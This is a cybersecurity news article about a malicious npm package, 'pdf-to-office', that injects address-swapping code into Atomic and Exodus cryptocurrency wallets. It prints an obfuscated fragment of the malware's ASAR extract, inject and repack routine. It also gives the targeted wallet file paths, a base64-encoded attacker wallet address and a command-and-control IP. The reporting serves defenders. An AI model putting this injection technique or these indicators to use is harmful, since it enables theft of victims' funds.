Cybersecurity researchers have uncovered a sophisticated malware campaign targeting cryptocurrency users through compromised npm packages.

The attack specifically targets users of Atomic and Exodus wallets, hijacking transactions by injecting malicious code that redirects funds to attacker-controlled addresses.

This latest campaign represents an escalation in the ongoing targeting of cryptocurrency users through software supply chain attacks.

The attack begins when developers unknowingly install compromised npm packages in their projects.

One such package identified in this campaign is “pdf-to-office,” which appears legitimate but contains hidden malicious functionality.

Once installed, the package examines the user’s system for installed cryptocurrency wallets and injects malicious code that can intercept and redirect transactions without the user’s knowledge.

The impact of this attack is potentially devastating for victims, as it can silently redirect cryptocurrency transactions to attacker-controlled wallets across multiple cryptocurrencies including Ethereum, Tron-based USDT, XRP, and Solana.

The malware effectively hijacks transactions by replacing legitimate wallet addresses with encoded attacker addresses at the moment users attempt to send funds.

ReversingLabs researchers identified this campaign through their analysis of suspicious npm packages, noting multiple telltale signs of malicious behavior including suspicious URL connections and code patterns similar to previously identified malicious packages.

Their analysis revealed that the attackers are deploying sophisticated techniques to maintain persistence and evade detection.

Technical examination reveals a multi-stage attack that begins with package installation and proceeds through wallet identification, file extraction, code injection, and ultimately transaction hijacking.

The attackers use obfuscation techniques to hide their true intentions, making detection challenging for traditional security tools.

Infection Mechanism and Code Injection

The malware’s infection process begins when the malicious package executes its payload targeting installed wallet software.

The malicious code first identifies the location of the wallet’s application files on the system and then targets the ASAR package format used by Electron-based applications.

The code specifically searches for files in paths such as “AppData/Local/Programs/atomic/resources/app.asar”.

Once located, the malware extracts the application archive, injects its malicious code, and then repacks the archive.

The following code snippet illustrates this process:-

const _0x3b6acf = path.join(_0x3pbact, 'dist', 'electron');
if (fs.existsSync(_0x59578f)) {
  await fs.mkdir(_0x3b6acf, {
    'recursive': true
  });
  await asar.extractAll(_0x59578f, _0x3b6acf);
  await fs.copyFile(_0x190a5b, _0x2e871a);
  await fs.copyFile(_0x1a4254, _0xf71fca);
  await asar.createPackage(_0x3b6acf, _0x59578f);
  await fs.rm(_0x3b6acf, {
    'recursive': true,
    'force': true
  });

The injection targets specific JavaScript files within the wallet software, particularly vendor files like “vendors.64b69c3b00e2a7914733.js”.

The malware modifies transaction handling code to replace legitimate wallet addresses with attacker-controlled ones using base64 encoding.

For example, when a user attempts to send ETH, the code replaces the recipient address with a decoded version of “MHg0N2V1MEU4MUY10URiMjdGMDM0ZjRlYjEwRjk5MTIzMGY2NmY1M2ZB”[1].

After completing the infection, the malware communicates with a command-and-control server at 178.156.149.109, sending installation status information including the user’s home directory path.

This allows attackers to track successful infections and potentially gather additional information about compromised systems.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!

Also Read: